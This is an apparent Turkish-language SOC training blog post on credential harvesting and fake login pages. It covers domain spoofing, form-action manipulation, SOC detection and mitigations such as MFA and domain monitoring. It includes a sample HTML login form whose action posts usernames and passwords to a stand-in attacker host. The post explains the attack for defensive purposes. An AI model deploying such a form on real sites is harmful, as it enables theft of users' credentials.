CyberFlow Logo CyberFlow BLOG
Soc L1 Tehdit Vektorleri Bruteforce Web Saldiri Izleri

Credential Harvesting ve Sahte Giriş Sayfalarını Anlama

✍️ Ahmet BİRKAN 📂 Soc L1 Tehdit Vektorleri Bruteforce Web Saldiri Izleri

Credential harvesting ve sahte giriş sayfaları hakkında bilgi sahibi olun. Bu tehditler, siber güvenlik alanında önemli riskler taşır.

Credential Harvesting ve Sahte Giriş Sayfalarını Anlama

Siber güvenlikte önemli bir tehdit olan credential harvesting ve sahte giriş sayfaları, kullanıcı bilgilerini ele geçirme amacı taşır. Bu yazıda, bu saldırı türlerinin detaylarına ve korunma yollarına yer veriyoruz.

Giriş ve Konumlandırma

Giriş

Son yıllarda siber saldırıların çeşitlenmesi, bireyler ve kurumlar için siber güvenlik tehditlerinin artmasına yol açmıştır. Bu tehditler arasında, kullanıcı kimlik bilgilerini toplamak amacıyla gerçekleştirilen "credential harvesting" (kimlik bilgisi toplama) saldırıları öne çıkmaktadır. Bu tür saldırılar, dolandırıcıların sahte giriş sayfaları aracılığıyla kullanıcıların bilgilerini ele geçirmelerine olanak tanır. Özellikle sosyal mühendislik tekniklerinin etkili bir şekilde kullanılması, bu saldırıların başarısını artırmaktadır.

Credential harvesting, genellikle zararlı web siteleri aracılığıyla gerçekleştirilen bir kimlik avı (phishing) tekniğidir. Bu tür saldırılarda, saldırganlar, kullanıcıların gerçek giriş bilgilerini girmesi için sahte bir arayüz sunarlar. Kullanıcılar bu sahte sayfelere yönlendirildiğinde, bilgilerini sağlama ihtiyacı hissederler. Bu aşama, siber güvenlik alanında önemli bir risk faktörü oluşturur çünkü elde edilen bilgiler, birçok saldırıda kullanılabilir hale gelir.

Neden Önemli?

Birçok kuruluş, kullanıcı bilgilerini ve kimlik verilerini korumak için yüksek maliyetli güvenlik altyapıları geliştirmektedir. Ancak, credential harvesting saldırıları, genelde düşük maliyetle yüksek getirisi olan bir tehdit türüdür. Saldırganlar, genellikle e-posta gibi sıkça kullanılan iletişim yöntemleri ile kullanıcılara ulaşıp onları sahte sayfalara yönlendirebilirler. Bu da, siber güvenlik uzmanlarının kimlik bilgisi hırsızlığı risklerini önceden tahmin etmelerini ve uygun önlemleri almalarını zorlaştırır.

Credential harvesting saldırılarının tespit edilmesi ve durdurulması, siber güvenlik literatüründe sıkça vurgulanan bir konu haline gelmiştir. Bu alandaki tehdit çeşitliliği, organizasyonların güvenlik önlemleri almasını zorunlu kılar. Aynı zamanda, sosyal mühendislik tekniklerinin etkili bir şekilde kullanımı, bu konuyu daha da kritik hale getirmektedir. Kullanıcı eğitimi, inceleme ve siber saldırılara karşı geliştirme yapılacak önlemler, bu noktada büyük önem taşır.

Siber Güvenlik, Pentest ve Savunma Açısından Bağlam

Siber güvenlik alanında yapılan penetrasyon testleri (pentest), sistemlerin zayıf noktalarının belirlenmesi ve olası saldırı senaryolarının test edilmesi açısından önemli bir rol oynamaktadır. Credential harvesting, test senaryolarında sıklıkla kullanılan bir saldırı vektörüdür. Bu nedenle, güvenlik uzmanlarının bu tür saldırıları anlayabilmesi ve sistemlerde uygun kontroller oluşturabilmesi gerekmektedir.

Credential harvesting saldırıları, genellikle gerçek servisleri taklit eden sahte alan adları kullanılarak gerçekleştirilir. Bu tür alan adı taklitleri (domain spoofing), kullanıcıların kendi bilgilerinin güvenli olup olmadığını sorgulamalarını zorlaştırır. Form datasının manipülasyonu ise saldırganların, aldıkları bilgileri kendi sunucularına yönlendirerek kâr elde etmelerini sağlar. Aşağıda basit bir örnek ile bu tür bir saldırının nasıl işlediğini görselleştirmek mümkündür:

1. Kullanıcı, web tarayıcısında www.ornek.com adresini yazar.
2. Saldırgan, ornek.com alan adını taklit eden sahte bir sayfaya yönlendirir.
3. Kullanıcı, sahte sayfada kimlik bilgilerini girer.
4. Bilgiler, saldırganın kontrolündeki sunucuya iletilir.

Bu örnekler, kullanıcıların bilgi güvenliği açısından dikkat etmeleri gereken önemli unsurlardan sadece bir kaçıdır. Bilgisayar güvenliği uzmanları ve organizasyonlar, bu tür tehditleri tespit etmek ve önlemek için sürekli olarak kendi güvenlik yapılarını gözden geçirmelidir.

Sonuç olarak, credential harvesting ve sahte giriş sayfalarına dair bir anlayışa sahip olmak, yalnızca tehditlerin tespiti için değil, aynı zamanda bu tehditlerle mücadele için de kritik bir adımdır. Bu nedenle, güvenlik uzmanları, bu alandaki gelişmeleri takip etmelidir. Kısa bir süre içinde yakından incelemek üzere sahte giriş sayfalarının özelliklerine, risklerine ve savunma tekniklerine geçeceğiz.

Teknik Analiz ve Uygulama

Credential Harvesting ve Sahte Giriş Sayfalarını Anlama

Credential Harvesting Tanımı

Credential harvesting, kullanıcıların kimlik bilgilerini ele geçirmek amacıyla kullanılmakta olan bir saldırı tekniğidir. Saldırganlar genellikle kullanıcıların güvenilir web sitelerine erişim sağladığına inandıkları sahte giriş sayfaları oluştururlar. Bu yöntem, kullanıcıların şifrelerini, e-posta adreslerini ve diğer hassas bilgilerini çalmayı hedefler.

Sahte Giriş Sayfaları ve Saldırı Teknikleri

Sahte giriş sayfaları (Fake Login Pages), genellikle bir phishing saldırısının parçası olarak karşımıza çıkar. Bu tür sayfalar, hedef alınan gerçek web sitesinin görünümünü taklit ederek, kullanıcılara kimlik bilgilerini girmelerini sağlamaya çalışır. Domain spoofing, bu tür bir saldırının en yaygın yöntemlerinden biridir. Burada, sahte alan adlarının kullanılmasıyla, gerçek bir servise benzer bir görünüm elde edilir.

Domain Spoofing

Domain spoofing, sahte bir alan adı kullanarak kullanıcının gerçek bir web sitesine bağlandığını sanmasına neden olan bir yöntemdir. Örneğin, www.realbank.com gibi bir alan adına www.real-bank.com gibi bir alternatif kullanmak, kullanıcıların kimlik bilgilerini tuzağa düşürmek için etkili bir yöntemdir.

Gerçek alan adı: www.guvenlibank.com
Sahte alan adı: www.guvenli-bank.com

Bu tür bir durumda, kullanıcı sahte sayfaya yönlendirildiğinde, şifre ve kullanıcı adı gibi bilgileri vermesi beklenir.

Form Action Redirect Analizi

Credential harvesting saldırılarında sıkça kullanılan bir diğer teknik, form action manipülasyonudur. Burada, form verileri, saldırganın kontrolündeki bir sunucuya yönlendirilir. Bu yöntemle, kullanıcıların girmiş olduğu tüm veriler doğrudan saldırganın eline geçmiş olur.

<form action="http://sahte-login.com/submit" method="POST">
    <input type="text" name="username" placeholder="Kullanıcı Adı" required>
    <input type="password" name="password" placeholder="Şifre" required>
    <input type="submit" value="Giriş Yap">
</form>

Yukarıdaki örnekte, form verileri sahte bir URL'ye gönderilmekte, kullanıcı bu durumu fark etmeden bilgilerini vermektedir.

Credential Harvesting Riskleri

Credential harvesting saldırıları, şirketlerin itibarını zedelerken aynı zamanda ciddi finansal kayıplara da yol açabilir. Kullanıcıların kimlik bilgileri ele geçirildiğinde, hesaplar hacklenebilir ve bu durum, müşteri güvenini sarsabilir. Ayrıca, bu tür saldırılar, GDPR gibi veri koruma yasalarına aykırıdır ve ciddi cezai yaptırımlara yol açabilir.

Credential Harvesting Güvenlik Kontrolleri

Credential harvesting'e karşı etkili bir savunma sağlamak için birkaç önlem alınabilir:

  • Alan adı izleme (Domain Monitoring): Faaliyetlerini izlemek ve tehdit oluşturan alan adlarını belirlemek için alan adı izleme sistemleri kurmak önemlidir. Bu sistemler, sahte alan adlarının kullanıldığı durumları tespit edebilir.

  • Sahte site engelleme (Phishing Protection): Antivirüs yazılımlarının ve güvenlik duvarlarının kullanımını artırmak, sahte giriş sayfalarının engellenmesine yardımcı olur. Kullanıcıların dikkatli olması ve güvenilir kaynaklardan bağlantılarını kontrol etmeleri gerekmektedir.

  • Ek doğrulama (MFA): Çok faktörlü kimlik doğrulama (MFA) kullanmak, bilgi sızıntısı olasılığını azaltmada etkili bir yöntemdir. Bu sayede, şifre ele geçirilse bile, ek bir doğrulama katmanı kullanıcı hesaplarını koruyacaktır.

Credential Harvesting Analizi

SOC (Security Operation Center) ekipleri, credential harvesting saldırılarını tespit etmek için bazı metotlar kullanır. Bu metotlar arasında alan adı anomalleri, giriş davranışları ve kimlik akışının analizi yer almaktadır. Özellikle, kullanıcıların davranış verilerinin analizi, olası bir tehdit durumunu hızlıca tespit eden temel unsurlardandır.

Bu alaşımda, sistemlerden elde edilen bilgilere dayanarak atıfta bulunan analiz teknikleri gibi araçlar kullanılabilir:

# Örnek bir alan adı kontrol komutu
dig fake-login.com

Bu şekilde, yanlış yönlendirilmiş veya sahte bir alan adı olup olmadığını belirlemek mümkün olacaktır.

Sonuç

Credential harvesting ve sahte giriş sayfaları, siber güvenlik alanında ciddi tehditlerdir. Bu tür saldırılara karşı alınacak önlemler, yalnızca bireyler için değil, aynı zamanda kuruluşların güvenliği açısından da kritik bir öneme sahiptir. Kullanıcıların, bu tehditlere karşı bilgili olması ve sürekli olarak dikkatli davranmaları, siber güvenliği artırmak için gereklidir.

Risk, Yorumlama ve Savunma

Credential harvesting (kimlik bilgisi toplama) ve sahte giriş sayfaları, günümüzde siber suçluların kullanıcı bilgilerini ele geçirmek amacıyla kullandıkları yaygın saldırı teknikleridir. Bu bölümde, bu tür saldırıların risklerini, tehditlerini yorumlayacak ve etkili savunma mekanizmalarını inceleyeceğiz.

Elde Edilen Bulguların Güvenlikle Anlamı

Bir saldırının siber güvenlik açısından ne anlama geldiğini anlamak için, öncelikle elde edilen bulguların iyi bir şekilde analiz edilmesi gerekmektedir. Credential harvesting sırasında kullanıcı bilgileri, genellikle sahte giriş sayfaları aracılığıyla toplanır. Bu tür bir saldırının ardından, kullanıcıların girilen bilgileri, saldırganların kontrolündeki bir sunucuya iletilir.

Bu bilgilerin güvenlik anlamı şu şekildedir:

  • Kullanıcı Verilerinin Ele Geçirilmesi: Eğer kullanıcı, sahte bir giriş sayfasına yönlendirilmişse, bu durum kullanıcı bilgilerini doğrudan kötü niyetli aktörlerin eline bırakır.
  • Kimlik Hırsızlığı: Elde edilen bilgilerle kötü amaçlı kişiler, kullanıcı hesaplarına erişim sağlayabilir veya daha büyük saldırılar gerçekleştirebilir.
  • Reputasyon Hasarı: Kullanıcı verilerinin çalınması, bir işletmenin itibarına büyük zarar verebilir, bu da müşteri kaybına neden olur.

Yanlış Yapılandırma veya Zafiyetler ve Etkileri

Credential harvesting risklerinin en önemli kaynaklarından biri yanlış yapılandırmalardır. Örneğin, uygulama geliştirme sırasında güvenlik önlemleri yeterince dikkatlice alınmadığında, saldırganların yaratacağı sahte giriş sayfaları için zemin hazırlanmış olur. Bu tür bir zafiyetin etkileri şunlardır:

  • Hızla Büyüyen Saldırı Yüzeyleri: Yanlış yapılandırmalar, siber suçlular için yeni saldırı yüzeyleri oluşturur. Örneğin, bir web uygulaması için zafiyet bulunması, tüm kullanıcıların bilgilerini tehlikeye atabilir.
  • Veri Sızıntıları: Eğer sistemde bir hata bulunuyorsa, bu durum kullanıcı verilerinin izinsiz bir şekilde açığa çıkmasına neden olabilir.

Sızan Veriler, Topoloji ve Servis Tespiti

Sızan veriler, saldırganların hangi tür verilere eriştiğini gösterir. Kullanıcı adı ve şifreler genellikle en çok hedef alınan verilerdir. Saldırganların gerçekleştirdiği bu tür eylemler, genellikle belirli bir yapıda meydana gelir; yani:

  • Topoloji: Saldırgan, hedef ağın yapısını veya müşteri yapısını anlamaya çalışır. Böylelikle, kimlerin hedef alacağının ve hangi erişim haklarının olduğunu tanımlar.
  • Servis Tespiti: Kimlik hırsızlığı başarılı olduğunda, saldırganlar genellikle çeşitli web servislerini sorgulayarak hangi hesapların daha fazla değer taşıdığını tespit ederler.

Profesyonel Önlemler ve Hardening Önerileri

Aşağıda, kimlik bilgisi toplama saldırılarına karşı nasıl koruma sağlanabileceğine dair bazı teknik önlemler listelenmiştir:

  1. Alan Adı İzleme: Alan adı taklidi (domain spoofing) saldırılarının önlenmesi için alan adlarınızı ve onların benzerlerini sürekli izlemek önemlidir. 

    # Alan adı izleme aracı kullanılabilir.
whois example.com

  2. Çok Faktörlü Kimlik Doğrulama (MFA): Kullanıcıların hesaplarına ek bir güvenlik katmanı eklemek için, çok faktörlü kimlik doğrulama yöntemlerini uygulamak etkili bir yöntemdir.

  3. Veri Yönlendirme Manipülasyonunu Engelleme: Web uygulamalarında form yönlendirme ve veri toplama işlemlerinde güvenlik açıklarının belirlenmesi ve minimize edilmesi gerekmektedir.

  4. Phishing Koruma: Kullanıcıların dolandırıcılık girişimlerini teşhis etmelerine yardımcı olacak eğitim programları uygulanmalıdır.

  5. Güvenlik Zafiyetlerinin Düzenli Kontrolü: Sistemlerin düzenli olarak güvenlik testlerine tabi tutulması ve olası zafiyetlerin onarılması, saldırı alanını daraltacaktır.

Sonuç Özeti

Credential harvesting, kullanıcı bilgilerini toplamak amacıyla gerçekleştiren ciddi bir siber tehdittir. Yanlış yapılandırmalar ve zafiyetler bu tehditin etkisini artırır. Alan adı izleme, çok faktörlü kimlik doğrulama ve phishing koruma gibi önlemlerle saldırılara karşı koruma sağlanabilir. Bilinçli bir yaklaşım, hem organizasyonlar hem de kullanıcılar için siber güvenliği artırarak güvenli bir dijital deneyim sunar.